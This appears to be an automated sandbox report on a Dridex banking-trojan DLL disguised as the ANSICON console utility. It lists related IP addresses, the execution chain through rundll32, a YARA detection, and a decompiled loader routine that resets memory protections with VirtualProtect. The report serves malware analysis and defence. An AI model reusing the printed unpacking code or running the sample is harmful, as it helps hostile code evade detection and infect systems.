159.203.93.122	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
50.116.27.97	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse
94.247.168.64	RuRxpMUPN7.dll	Get hash	malicious	Browse
	u3A1eWFqLE.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	IHUVPJ4hXu.dll	Get hash	malicious	Browse
	CTkT1fRtQv.dll	Get hash	malicious	Browse
	BJKPKLUPiD.dll	Get hash	malicious	Browse
	RuRxpMUPN7.dll	Get hash	malicious	Browse
	qMus8K6kXx.dll	Get hash	malicious	Browse
	gsG7jGFk3I.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	Ce28zthEz1.dll	Get hash	malicious	Browse
	15sV4KdrCN.dll	Get hash	malicious	Browse
	Yvl2Gke3pv.dll	Get hash	malicious	Browse
	1UmI5PSg3K.dll	Get hash	malicious	Browse
	9eYYTTlVYi.dll	Get hash	malicious	Browse
	9JXXdpfiQm.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DIGITALOCEAN-ASNUS	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	u3A1eWFqLE.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	159.203.93.122
	CTkT1fRtQv.dll	Get hash	malicious	Browse	159.203.93.122
	BJKPKLUPiD.dll	Get hash	malicious	Browse	159.203.93.122
	RuRxpMUPN7.dll	Get hash	malicious	Browse	159.203.93.122
	qMus8K6kXx.dll	Get hash	malicious	Browse	159.203.93.122
	gsG7jGFk3I.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	Ce28zthEz1.dll	Get hash	malicious	Browse	159.203.93.122
	15sV4KdrCN.dll	Get hash	malicious	Browse	159.203.93.122
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	159.203.93.122
	1UmI5PSg3K.dll	Get hash	malicious	Browse	159.203.93.122
	9eYYTTlVYi.dll	Get hash	malicious	Browse	159.203.93.122
	9JXXdpfiQm.dll	Get hash	malicious	Browse	159.203.93.122
LINODE-APLinodeLLCUS	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	u3A1eWFqLE.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	50.116.27.97
	CTkT1fRtQv.dll	Get hash	malicious	Browse	50.116.27.97
	BJKPKLUPiD.dll	Get hash	malicious	Browse	50.116.27.97
	RuRxpMUPN7.dll	Get hash	malicious	Browse	50.116.27.97
	qMus8K6kXx.dll	Get hash	malicious	Browse	50.116.27.97
	gsG7jGFk3I.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	Ce28zthEz1.dll	Get hash	malicious	Browse	50.116.27.97
	15sV4KdrCN.dll	Get hash	malicious	Browse	50.116.27.97
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	50.116.27.97
	1UmI5PSg3K.dll	Get hash	malicious	Browse	50.116.27.97
	9eYYTTlVYi.dll	Get hash	malicious	Browse	50.116.27.97
	9JXXdpfiQm.dll	Get hash	malicious	Browse	50.116.27.97
GLESYS-ASSE	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	u3A1eWFqLE.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	IHUVPJ4hXu.dll	Get hash	malicious	Browse	94.247.168.64
	CTkT1fRtQv.dll	Get hash	malicious	Browse	94.247.168.64
	BJKPKLUPiD.dll	Get hash	malicious	Browse	94.247.168.64
	RuRxpMUPN7.dll	Get hash	malicious	Browse	94.247.168.64
	qMus8K6kXx.dll	Get hash	malicious	Browse	94.247.168.64
	gsG7jGFk3I.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	Ce28zthEz1.dll	Get hash	malicious	Browse	94.247.168.64
	15sV4KdrCN.dll	Get hash	malicious	Browse	94.247.168.64
	Yvl2Gke3pv.dll	Get hash	malicious	Browse	94.247.168.64
	1UmI5PSg3K.dll	Get hash	malicious	Browse	94.247.168.64
	9eYYTTlVYi.dll	Get hash	malicious	Browse	94.247.168.64
	9JXXdpfiQm.dll	Get hash	malicious	Browse	94.247.168.64

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_c7ca2540c4b6526dfdf44662714aed219cc3cf7_160cf2be_0d9dddb1\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	9240
Entropy (8bit):	3.761697724645563
Encrypted:	false
SSDEEP:	96:bCS8WFXyOy9hAnC5Q56tpXIQcQ6c6n+hcEZcw3P+a+z+HbHg+6eugtYsaV9w72og:eVFHUb+hjbjVq/u7sBS274Itb2rS
MD5:	DCD9D9EE9246BA1975EA61E5E2906A70
SHA1:	8B5DD70FA4456249778A0538BE9B1BF32F11AFFF
SHA-256:	17914F21001141A837D2BC5015B6699FC9EB591CDF3D1D1495097E6D3EAA4529
SHA-512:	1EEFB46FED00ADA88C261F004B0C5FF49C141828B85D7DA5FD6527F408FEF2AAC5F46EF48F39873F5D3F150F81AC371A039ED50951985CBD6D069BEC31B74EF2
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.3.3.7.4.9.1.9.8.0.3.9.7.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.3.b.5.e.2.0.-.6.c.a.0.-.4.0.4.4.-.b.b.2.e.-.b.e.9.a.6.8.9.4.2.d.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.0.b.6.d.f.0.-.7.6.3.8.-.4.0.d.a.-.8.3.c.d.-.5.c.a.9.6.f.8.c.9.5.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.0.-.0.0.0.1.-.0.0.1.7.-.d.f.2.a.-.1.9.d.3.b.0.3.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE11.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Apr 20 06:48:41 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	24754
Entropy (8bit):	2.672443600937589
Encrypted:	false
SSDEEP:	96:5Bn8M/doXwMBVfnJHWTw5GZFzy1hCiDF0f/FXY5WI3WIk7I4HH5b0n4qQOaobHEk:LuWqG7zyCeF0ftX3HH5bG47OaIH1
MD5:	FF84AF3F201D9822D8B4395765446DAB
SHA1:	7BA6DE4596616074470EA74CC80C545E668E5E52
SHA-256:	A537AE22FAA595E9F14E9C71B58DB890C60EC0DC8C64D138E3C616769C643515
SHA-512:	3F0C1C61F3BCAA752AB69C090F9006DB5128114596E2C46D662EFEF405F2DD359390ED6D69F354AFB5DF4DE7E45791D53A4917AFDE6957237019362A85CFE178
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......Iy~`...................U...........B......,.......GenuineIntelW...........T............x~`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD48B.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.6891961408991523
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiT46OKR6YJhSUNngmfoS1WCpBg89bihsfGb2m:RrlsNis6OKR6Y/SUNngmfoS1hiafGz
MD5:	19187A84832FDD3E710FA2A9419F6178
SHA1:	3452DD564B3A2E3A97737E5882F537817EBBA74F
SHA-256:	3A5EA0A2AD0486B29D5C260D9FDD99E6820ED9A8FF2C3CAC6A1AA65D7ABF3B6F
SHA-512:	9B64353FFCD0364600313EC6A96E6F5BABB134165F0899CA9E8FF449C5E574CF611522AD00AFE00473945B83EAD62F41CACC04AE5419E568F2D9FE418120B0AE
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.2.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD7D7.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.430367311687242
Encrypted:	false
SSDEEP:	48:cvIwSD8zsqJgtWI9+oWSC8B78fm8M4JVrRF9o+q8v7rCKcQIcQw6UrXQd:uITf4dBSNuJvoKSKkw68XQd
MD5:	7A6979D9C986A801FAB7B26622910A1E
SHA1:	54527D05E7985355F0C76FEC93C36499F380D243
SHA-256:	8AB1D7FB689131CE25A24203858343945003FD05C3873E4BF82C02C26F5DB926
SHA-512:	7C18E31F19233FAAB34B1BA2F2B137D49164A1F8AC02F98986C0A12744AD699A8DAB4834174169BCF13D05C21A6263F1C5D2190607488DBBEACD8B51E71D017C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="954239" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.548558116726497
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BJKPKLUPiD.dll
File size:	163840
MD5:	ffc39c266b67da9e1847106d0adc566b
SHA1:	37f852cd92c6191ae6b34ffb6ce69646b09b2900
SHA256:	b3bc5083836846848f682dc1a2ab091ac3c5256d6924952232c524287911d6fd
SHA512:	2632da6673fa8b216aaacb8c68a8b9928c37bdf2b3beec050d6b6189c494b12e1b5e6137a9f97900db50f4a5e4c9bc741d56cfc39c398d2aab4138a88f0340d6
SSDEEP:	3072:NWX2IjzzpM+PncPeY8+O3AU3HRIHPh3UGfXy0BHNkIv/ScbQQ2y0iNM0+y+N0tc:N42IfzNPnoeY8j3AsHGPXpHNj6rByM3
File Content Preview:	MZ......................@...........................................[}..[}..[}..[}...}..@.2..\|..=.T..}....S.z\|..@..._}..\|...T\|..V/C..\|..V/E..\|..Rich[}..............PE..L.....}`...........!.........f.......D.......P....@....................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x424410
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607DE4E5 [Mon Apr 19 20:15:33 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	b84fd50f2389cfd5bd83e2cf062986d1

Entrypoint Preview

Instruction
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
sub eax, 00002233h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
mov edx, 00000000h
cmpss xmm1, xmm2, 03h
cmp edx, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
je 00007F2404E0239Bh
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h
mov eax, 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1001	0x0	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2768c	0x59	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x340	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2d000	0x14c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x25040	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2356e	0x23600	False	0.761560015459	data	7.55877156847	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0x2842	0x2a00	False	0.791573660714	data	7.53164670284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0x28000	0x3588	0x1600	False	0.783380681818	MMDF mailbox	7.34765964879	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x340	0x400	False	0.390625	data	2.73456990044	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2d000	0x14c	0x200	False	0.62890625	data	4.21021599876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x2c060	0x2e0	data	English	United States

Imports

DLL	Import
KERNEL32.dll	CloseHandle, OpenSemaphoreW, LoadLibraryExA, GetModuleHandleW, OutputDebugStringA, GetProfileSectionW
OPENGL32.dll	glTexSubImage1D
ole32.dll	CreateStreamOnHGlobal
USER32.dll	TranslateMessage
ADVAPI32.dll	RegLoadAppKeyW

Version Infos

Description	Data
LegalCopyright	Freeware
InternalName	ANSI32
FileVersion	1.66
CompanyName	Jason Hood
Comments	http://ansicon.adoxa.vze.com/
ProductName	ANSICON
ProductVersion	1.66
FileDescription	ANSI Console
OriginalFilename	ANSI32.dll
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6528 Parent PID: 5984

General

Start time:	23:46:00
Start date:	19/04/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll'
Imagebase:	0xfa0000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6560 Parent PID: 6528

General

Start time:	23:46:00
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6608 Parent PID: 6560

General

Start time:	23:46:00
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',#1
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.727624069.0000000070981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6748 Parent PID: 6528

General

Start time:	23:46:33
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\BJKPKLUPiD.dll',ReadLogRecord
Imagebase:	0x960000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000005.00000002.728718792.0000000070981000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 3548 Parent PID: 6528

General

Start time:	23:48:35
Start date:	19/04/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6528 -s 148
Imagebase:	0x8c0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6528 Parent PID: 5984 loaddll32.exeCOMMON

Executed Functions

Function 008F2213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E008F2213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0x8f4418 = 1;
				asm("movaps xmm0, [0x8f3010]");
				asm("movups [0x8f4428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E008F2569();
				E008F1D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E008F2569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v144 = _v108;
				if(_v60 != 0) {
					_v148 = 0;
					_v152 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
					while(1) {
						_t170 = _v152;
						_v160 = _t170;
						_t247 = _v160;
						_v184 = _v72 +  *((intOrPtr*)(_t247 + 0xc));
						_v180 =  *((intOrPtr*)(_t247 + 8));
						_v176 =  *((intOrPtr*)(0x8f4418 + (( *(_t170 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t170 + 0x24) >> 0x1f << 3) + (( *(_t170 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v164 = _v148;
						_t177 = VirtualProtect(??, ??, ??, ??); // executed
						_t271 = _t271 - 0x10;
						_t234 = _v164 + 1;
						_v168 = _t177;
						_v148 = _t234;
						_v152 = _v160 + 0x28;
						if(_t234 == _v60) {
							goto L9;
						}
					}
				}
				L9:
				 *_t271 = _v72;
